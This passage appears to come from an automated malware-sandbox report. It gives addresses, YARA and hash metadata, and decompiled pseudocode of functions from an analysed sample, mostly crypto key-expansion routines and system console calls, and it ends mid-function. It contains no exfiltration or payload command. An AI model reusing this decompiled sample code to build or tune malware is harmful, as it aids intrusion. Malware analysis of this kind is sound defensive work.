                                    0x0041dfef
                                    0x0041dff5
                                    0x0041dff5
                                    0x0041dffe
                                    0x0041e005
                                    0x0041e00b
                                    0x0041e00b
                                    0x0041e022
                                    0x0041e028
                                    0x0041e02f
                                    0x0041e036
                                    0x0041e03c
                                    0x0041e042
                                    0x0041e04d
                                    0x0041e050
                                    0x0041e05d
                                    0x0041e05e
                                    0x0041e064
                                    0x0041e06a
                                    0x0041e06a
                                    0x0041e077
                                    0x0041e07e
                                    0x0041e091
                                    0x0041e098
                                    0x0041e09f
                                    0x0041e0a6
                                    0x0041e0a7
                                    0x0041e0a8
                                    0x0041e0a9
                                    0x0041e0b5
                                    0x0041e0b8
                                    0x0041e0be
                                    0x0041e0c4
                                    0x0041e0ca
                                    0x0041e0d1
                                    0x0041e0dd
                                    0x0041e0de
                                    0x0041e0ef
                                    0x0041e0f5
                                    0x0041e102
                                    0x0041e108
                                    0x0041e111
                                    0x0041e117
                                    0x0041e11d
                                    0x0041e122
                                    0x0041e129
                                    0x0041e12f
                                    0x0041e135
                                    0x0041e13c
                                    0x0041e142
                                    0x0041e142
                                    0x0041e14e
                                    0x0041e154
                                    0x0041e157
                                    0x0041e15d
                                    0x0041e163
                                    0x0041e16a
                                    0x0041e176
                                    0x0041e176
                                    0x0041e183
                                    0x0041e18e
                                    0x0041e192
                                    0x0041e198
                                    0x0041e19b
                                    0x0041e1a2
                                    0x0041e1a9
                                    0x0041e1b6
                                    0x0041e1bc
                                    0x0041e1c2
                                    0x0041e1c9
                                    0x0041e1cf
                                    0x0041e1d6
                                    0x0041e1dd
                                    0x0041e1e9
                                    0x0041e1f0
                                    0x0041e1f6
                                    0x0041e1fd
                                    0x0041e203
                                    0x0041e20a
                                    0x0041e20b
                                    0x0041e211
                                    0x0041e218
                                    0x0041e219
                                    0x0041e220
                                    0x0041e226
                                    0x0041e22c
                                    0x0041e245
                                    0x0041e24b
                                    0x0041e251
                                    0x0041e25d
                                    0x0041e263
                                    0x0041e264
                                    0x0041e267
                                    0x0041e273
                                    0x0041e276
                                    0x0041e282
                                    0x0041e285
                                    0x0041e28a
                                    0x0041e290
                                    0x0041e290
                                    0x0041e297
                                    0x0041e29d
                                    0x0041e29e
                                    0x0041e2a3
                                    0x0041e2a9
                                    0x0041e2b5
                                    0x0041e2b5
                                    0x0041e2c1
                                    0x0041e2c7
                                    0x0041e2d4
                                    0x0041e2d4
                                    0x0041e2e0
                                    0x0041e2ec
                                    0x0041e2f9
                                    0x0041e306
                                    0x0041e30c
                                    0x0041e312
                                    0x0041e32a
                                    0x0041e330
                                    0x0041e336
                                    0x0041e33c
                                    0x0041e348
                                    0x0041e354
                                    0x0041e35c

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c1ae467cd16b238061e87758e33179c009ee9c89ad3846a77996a1c5d8e25dc1
                                    • Instruction ID: d1766bdbe82298faeaa42dc88495ab29ddcef1c7bff2b3fffd10119fff6109d4
                                    • Opcode Fuzzy Hash: c1ae467cd16b238061e87758e33179c009ee9c89ad3846a77996a1c5d8e25dc1
                                    • Instruction Fuzzy Hash: EE81107298D3C1CFEB01DF28D8AA6463F70F756320709078DC4A25B2D2D37426AACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                    0x00402d93
                                    0x00402d98
                                    0x00402da0
                                    0x00402da9
                                    0x00402db3
                                    0x00402dba
                                    0x00402dc3
                                    0x00402dce
                                    0x00402dd6
                                    0x00402ddf
                                    0x00402dea
                                    0x00402df0
                                    0x00402df5
                                    0x00402dfe
                                    0x00402e09
                                    0x00402e11
                                    0x00402e1a
                                    0x00402e25
                                    0x00402e2d
                                    0x00402e36
                                    0x00402e41
                                    0x00402e49
                                    0x00402e52
                                    0x00402e5d
                                    0x00402e65
                                    0x00402e6e
                                    0x00402e80
                                    0x00402e83
                                    0x00402f9f
                                    0x00402fa4
                                    0x00402e89
                                    0x00402e89
                                    0x00402e8c
                                    0x00402e8e
                                    0x00402e91
                                    0x00402e91
                                    0x00402ef6
                                    0x00402efb
                                    0x00402efd
                                    0x00402f03
                                    0x00402f05
                                    0x00402f0b
                                    0x00402f0d
                                    0x00402f10
                                    0x00402f16
                                    0x00000000
                                    0x00000000
                                    0x00402f72
                                    0x00402f78
                                    0x00402f7a
                                    0x00402f80
                                    0x00402f82
                                    0x00402f87
                                    0x00402f88
                                    0x00402f8b
                                    0x00402f8e
                                    0x00402f91
                                    0x00402f97
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00402f97
                                    0x00402fae
                                    0x00402fae
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                    • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                    • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401026, Relevance: .1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2be1b2bc641445b4b6787b6cb002965a14d6898d53cb98377d2e2ede019d7c1f
                                    • Instruction ID: 3715912791a6f78db88ad8e23f17bbc7f9d65dac392f92da923631554a8b9e93
                                    • Opcode Fuzzy Hash: 2be1b2bc641445b4b6787b6cb002965a14d6898d53cb98377d2e2ede019d7c1f
                                    • Instruction Fuzzy Hash: F53180516597F14ED30E836D08B9675AEC18E9720174EC2FEDADA6F3F3C4888408D3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                    0x00401030
                                    0x0040105b
                                    0x0040105d
                                    0x00401063
                                    0x00401065
                                    0x00401065
                                    0x00401071
                                    0x00401076
                                    0x0040107c
                                    0x004010ac
                                    0x004010ae
                                    0x004010b4
                                    0x004010ba
                                    0x004010bc
                                    0x004010bc
                                    0x004010cb
                                    0x004010d0
                                    0x004010d6
                                    0x00401101
                                    0x00401103
                                    0x00401109
                                    0x0040110f
                                    0x00401111
                                    0x00401111
                                    0x00401120
                                    0x00401128
                                    0x0040112b
                                    0x0040114f
                                    0x00401156
                                    0x0040115d
                                    0x00401169
                                    0x0040116c
                                    0x0040116f
                                    0x00401173

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                    • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                    • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: cmd.exe PID: 7024 Parent PID: 3424 cmd.exeCOMMON

                                    Executed Functions

                                    Function 03AA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: e9d5ca8b9547b7236944530d3a87c68c2a32684be23c2dad69155b0280ba3b16
                                    • Instruction ID: 7ee4ff53b23900ef3d2cbaa737b414235b11a0512867d9854a61f6ed580bddfd
                                    • Opcode Fuzzy Hash: e9d5ca8b9547b7236944530d3a87c68c2a32684be23c2dad69155b0280ba3b16
                                    • Instruction Fuzzy Hash: 6290026921304403D1C0B569540C64A1019D7D2242F91D426A0005558DCA5598696371
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 3855e340f50985e2c097b584e09d7e8d34c38d0361afe9d39cd72bbead6a04a2
                                    • Instruction ID: 328ed36aa6e60596d94c675df539022fe7e0c59a6f6b256406ca6ccfa31c0ec4
                                    • Opcode Fuzzy Hash: 3855e340f50985e2c097b584e09d7e8d34c38d0361afe9d39cd72bbead6a04a2
                                    • Instruction Fuzzy Hash: 6590027131118803D150A56984087461019D7D2241F51C422A0814558EC7D598917172
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f1504ce3373c879d8152dae443ba4fa7f5020b5863cb0b1b9635453cc6516f60
                                    • Instruction ID: d63550894b1d584e155f3cfc879757fa3966b7bb946957b97950358abaef5194
                                    • Opcode Fuzzy Hash: f1504ce3373c879d8152dae443ba4fa7f5020b5863cb0b1b9635453cc6516f60
                                    • Instruction Fuzzy Hash: 5090027120104803D140A9A9540C6861019D7E1341F51D022A5014555FC7A598917171
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: dc41c7d007174e04bfbd032d33ddec9921c42d6c7fd68588ad72d81f26adaf01
                                    • Instruction ID: ad9b1bc54434a8eb92568ad569083ba2d6f6b48ab514cc280a840a9e6941efb0
                                    • Opcode Fuzzy Hash: dc41c7d007174e04bfbd032d33ddec9921c42d6c7fd68588ad72d81f26adaf01
                                    • Instruction Fuzzy Hash: 5A9002712010CC03D150A569840878A1019D7D1341F55C422A4414658EC7D598917171
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: eaf714407b2bdd3acde8c0938ada602fc26c2eb04e769e268d14e64b60d64ebe
                                    • Instruction ID: 4c978cc2432418b911732bdd0c4757a9756feab6f6cd0d09ff80393be00753af
                                    • Opcode Fuzzy Hash: eaf714407b2bdd3acde8c0938ada602fc26c2eb04e769e268d14e64b60d64ebe
                                    • Instruction Fuzzy Hash: 8A90027120104C43D140A5694408B861019D7E1341F51C027A0114654EC755D8517571
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 648150ab8302a9d0975622627b1be9984e40abf3b2d9beb55bbdad15b7a9e6b5
                                    • Instruction ID: 98494755c64e7001c43fcecfc03655670f9ba84122534002f9812ec1bb0e465d
                                    • Opcode Fuzzy Hash: 648150ab8302a9d0975622627b1be9984e40abf3b2d9beb55bbdad15b7a9e6b5
                                    • Instruction Fuzzy Hash: C490026121184443D240A9794C18B471019D7D1343F51C126A0144554DCA5598616571
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 62c65f61946ff7f57f5b14f6a50082c22bf1ee9250d193c8747bf47c80fc6ed5
                                    • Instruction ID: a0515ca7205b52fe3fc51b584fc68599b57dace62165e7455205d77da3e2b5d6
                                    • Opcode Fuzzy Hash: 62c65f61946ff7f57f5b14f6a50082c22bf1ee9250d193c8747bf47c80fc6ed5
                                    • Instruction Fuzzy Hash: 779002A134104843D140A5694418B461019D7E2341F51C026E1054554EC759DC527176
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 3b16ef1516d5d58172e52e1ddd68bf671bac7eb74aa450de246b600b30aab203
                                    • Instruction ID: d1293305ae6fb1a0800209ef54a1679ef6e51628a6c41f73416d8fd0da15d1dc
                                    • Opcode Fuzzy Hash: 3b16ef1516d5d58172e52e1ddd68bf671bac7eb74aa450de246b600b30aab203
                                    • Instruction Fuzzy Hash: A99002A1202044038145B5694418656501ED7E1241F51C032E1004590EC66598917175
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 522bae51fb4d1661cc48452788c61d13c43f8b4390ebd03912caa88ffe4a9bfe
                                    • Instruction ID: d6474918def5e8a5a2798652eae79538ef67bd42b0e618a7a50940de94b96c58
                                    • Opcode Fuzzy Hash: 522bae51fb4d1661cc48452788c61d13c43f8b4390ebd03912caa88ffe4a9bfe
                                    • Instruction Fuzzy Hash: 4F9002B120104803D180B56944087861019D7D1341F51C022A5054554FC7999DD576B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 90bc4889496243bb7d4181327a2bf8e83533171537559deee47b078dbc10ac74
                                    • Instruction ID: fdeb0e6d71e9b8ad031f8935270e25caad15ea997d355f92ea8b5888ff92f032
                                    • Opcode Fuzzy Hash: 90bc4889496243bb7d4181327a2bf8e83533171537559deee47b078dbc10ac74
                                    • Instruction Fuzzy Hash: 0A900265211044034145E9690708547105AD7D6391751C032F1005550DD76198616171
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1ae6b517cea4a370032050cfd16d95258039de66d1acc0e96b587752239a7f30
                                    • Instruction ID: e9016c49dc600b7471dcef5015355999376af58616b81de81218e51c5fcba12c
                                    • Opcode Fuzzy Hash: 1ae6b517cea4a370032050cfd16d95258039de66d1acc0e96b587752239a7f30
                                    • Instruction Fuzzy Hash: 8F90027120104813D151A5694508747101DD7D1281F91C423A0414558ED7969952B171
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4c34e1ce2480527293671fd83bd3b053aa349ce600cfea3e7668a4288dc6fc0a
                                    • Instruction ID: 6216928f0dd57f8c717d7c49c1d1bff8a0976dfbb061f0550725da6f5a6bae70
                                    • Opcode Fuzzy Hash: 4c34e1ce2480527293671fd83bd3b053aa349ce600cfea3e7668a4288dc6fc0a
                                    • Instruction Fuzzy Hash: 39900261242085539585F5694408547501AE7E1281B91C023A1404950DC666A856E671
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: a2dd23988e99c500e3e67fe9d65ac2e1ef0a07b7b290a9a9dad13bc0ca2d88d8
                                    • Instruction ID: 33a10901a46bc04dad2c57a586764bc2aa560d8a9c20a2262dc1e8908df96bd5
                                    • Opcode Fuzzy Hash: a2dd23988e99c500e3e67fe9d65ac2e1ef0a07b7b290a9a9dad13bc0ca2d88d8
                                    • Instruction Fuzzy Hash: CEB09B729014D9C6D651D774460C7277914BBD5741F16C067D1020741B477CD091F5B6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 011F3506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E011F3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x11fd0b4; // 0x8c8bfe4f
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x1213cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x1217f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x1217f20);
					_t87 = _t86;
				} else {
